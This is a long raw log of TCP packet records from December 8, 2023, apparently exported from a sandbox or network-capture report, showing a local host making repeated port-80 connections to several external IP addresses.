                                                                                                                                                            Dec 8, 2023 14:52:08.842057943 CET4976780192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:08.966870070 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:08.966999054 CET4976780192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:08.967581987 CET4976780192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:09.092546940 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.092608929 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.092642069 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.092674971 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.092709064 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.092760086 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.092792034 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.092824936 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.092858076 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.291145086 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.294420958 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.294481039 CET804976734.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:09.294511080 CET4976780192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:09.294588089 CET4976780192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:10.482404947 CET4976780192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:11.498831034 CET4976880192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:11.623763084 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.623855114 CET4976880192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:11.624073982 CET4976880192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:11.748867989 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.947863102 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.961240053 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.961343050 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.961360931 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.961412907 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.961452007 CET4976880192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:11.961487055 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.961543083 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:11.961548090 CET4976880192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:11.961569071 CET4976880192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:11.961590052 CET4976880192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:11.962398052 CET4976880192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:12.087032080 CET804976834.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:17.354054928 CET4976980192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:17.607887030 CET804976981.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:17.607979059 CET4976980192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:17.612606049 CET4976980192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:17.867712021 CET804976981.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:17.869066000 CET804976981.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:17.869123936 CET804976981.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:17.869203091 CET4976980192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:19.122796059 CET4976980192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:20.138766050 CET4977080192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:20.391889095 CET804977081.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:20.391985893 CET4977080192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:20.392215014 CET4977080192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:20.648586035 CET804977081.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:20.649234056 CET804977081.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:20.649319887 CET804977081.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:20.649466991 CET4977080192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:21.904048920 CET4977080192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:22.920044899 CET4977180192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:23.174071074 CET804977181.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:23.174336910 CET4977180192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:23.174957037 CET4977180192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:23.428963900 CET804977181.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:23.429282904 CET804977181.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:23.429385900 CET804977181.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:23.429527044 CET804977181.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:23.429650068 CET804977181.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:23.430182934 CET804977181.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:23.430197954 CET804977181.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:23.430274010 CET4977180192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:24.685379982 CET4977180192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:25.702590942 CET4977280192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:25.956223965 CET804977281.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:25.956376076 CET4977280192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:25.956589937 CET4977280192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:26.210041046 CET804977281.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:26.210994959 CET804977281.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:26.211009026 CET804977281.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:26.211144924 CET4977280192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:26.211302042 CET4977280192.168.2.481.169.145.70
                                                                                                                                                            Dec 8, 2023 14:52:26.464876890 CET804977281.169.145.70192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:31.939461946 CET4977380192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:32.217155933 CET804977385.159.66.93192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:32.217263937 CET4977380192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:32.217535973 CET4977380192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:32.495026112 CET804977385.159.66.93192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:32.558415890 CET804977385.159.66.93192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:32.558609009 CET4977380192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:33.732106924 CET4977380192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:34.748366117 CET4977480192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:35.026525974 CET804977485.159.66.93192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:35.026664972 CET4977480192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:35.026890993 CET4977480192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:35.304168940 CET804977485.159.66.93192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:35.367470026 CET804977485.159.66.93192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:35.367580891 CET4977480192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:36.529347897 CET4977480192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:37.546040058 CET4977580192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:37.821531057 CET804977585.159.66.93192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:37.822788954 CET4977580192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:37.823259115 CET4977580192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:38.099231005 CET804977585.159.66.93192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:38.099247932 CET804977585.159.66.93192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:38.099261045 CET804977585.159.66.93192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:38.160669088 CET804977585.159.66.93192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:38.162178040 CET804977585.159.66.93192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:38.162276030 CET4977580192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:39.325861931 CET4977580192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:40.341932058 CET4977680192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:40.619250059 CET804977685.159.66.93192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:40.619438887 CET4977680192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:40.619764090 CET4977680192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:40.898921013 CET804977685.159.66.93192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:40.899094105 CET4977680192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:40.899321079 CET4977680192.168.2.485.159.66.93
                                                                                                                                                            Dec 8, 2023 14:52:41.178170919 CET804977685.159.66.93192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:46.987917900 CET4977780192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:47.184621096 CET8049777162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:47.184726954 CET4977780192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:47.184953928 CET4977780192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:47.381448984 CET8049777162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:47.394695997 CET8049777162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:47.394762039 CET8049777162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:47.394972086 CET4977780192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:48.685211897 CET4977780192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:49.701220989 CET4977880192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:49.897872925 CET8049778162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:49.898047924 CET4977880192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:49.898237944 CET4977880192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:50.095019102 CET8049778162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:50.103866100 CET8049778162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:50.103884935 CET8049778162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:50.103938103 CET4977880192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:51.403933048 CET4977880192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:52.420128107 CET4977980192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:52.616444111 CET8049779162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:52.616605043 CET4977980192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:52.618525028 CET4977980192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:52.815146923 CET8049779162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:52.815661907 CET8049779162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:52.815684080 CET8049779162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:52.827841043 CET8049779162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:52.828255892 CET8049779162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:52.828387976 CET4977980192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:54.124552011 CET4977980192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:55.138684988 CET4978080192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:55.334616899 CET8049780162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:55.334759951 CET4978080192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:55.335270882 CET4978080192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:55.531567097 CET8049780162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:55.547863960 CET8049780162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:55.548142910 CET8049780162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:55.548218966 CET4978080192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:55.548249006 CET4978080192.168.2.4162.241.252.161
                                                                                                                                                            Dec 8, 2023 14:52:55.744163036 CET8049780162.241.252.161192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:01.269397974 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:01.509095907 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:01.509279013 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:01.509511948 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:01.749089956 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:02.853344917 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:02.853411913 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:02.853451967 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:02.853461981 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:02.853491068 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:02.853528023 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:02.853529930 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:02.853564024 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:02.853600025 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:02.853600979 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:02.853637934 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:02.853673935 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:02.853678942 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:02.853712082 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:02.853751898 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.013286114 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.093631983 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.093700886 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.093739986 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.093777895 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.093816042 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.093830109 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.093830109 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.093830109 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.093859911 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.093859911 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.093897104 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.093940973 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.094021082 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.094058990 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.094068050 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.094101906 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.094166040 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.094212055 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.094522953 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.094566107 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.094613075 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.094650984 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.094656944 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.094691038 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.094692945 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.094727993 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.094733953 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.094764948 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.094765902 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.094805002 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.094835997 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.094878912 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.094935894 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.094980001 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.095036983 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.095081091 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.095138073 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.095180988 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:03.095367908 CET8049781185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:03.095411062 CET4978180192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:04.878972054 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:05.118127108 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:05.118370056 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:05.118521929 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:05.357446909 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.360938072 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.360991955 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361032009 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361063957 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.361068010 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361109018 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361148119 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361149073 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.361185074 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361222982 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361229897 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.361280918 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.361323118 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361358881 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.361452103 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.600351095 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600379944 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600394011 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600456953 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600505114 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600646973 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600667000 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.600701094 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.600764990 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.600773096 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600810051 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600863934 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600886106 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.600931883 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.600994110 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.601022959 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601123095 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601172924 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601197004 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.601294994 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601362944 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.601371050 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601461887 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601526022 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601531029 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.601648092 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601702929 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601731062 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.601754904 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.601823092 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.622687101 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.839814901 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.839874983 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.839915991 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.839952946 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.839950085 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.839991093 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840027094 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840028048 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840027094 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840068102 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840075016 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840087891 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840121984 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840126038 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840158939 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840166092 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840197086 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840202093 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840234041 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840240002 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840272903 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840276957 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840311050 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840317011 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840348005 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840354919 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840385914 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840399027 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840424061 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840425014 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840465069 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840466976 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840511084 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840528011 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840572119 CET4978280192.168.2.4185.74.252.11
                                                                                                                                                            Dec 8, 2023 14:53:06.840586901 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840622902 CET8049782185.74.252.11192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:53:06.840660095 CET8049782185.74.252.11192.168.2.4
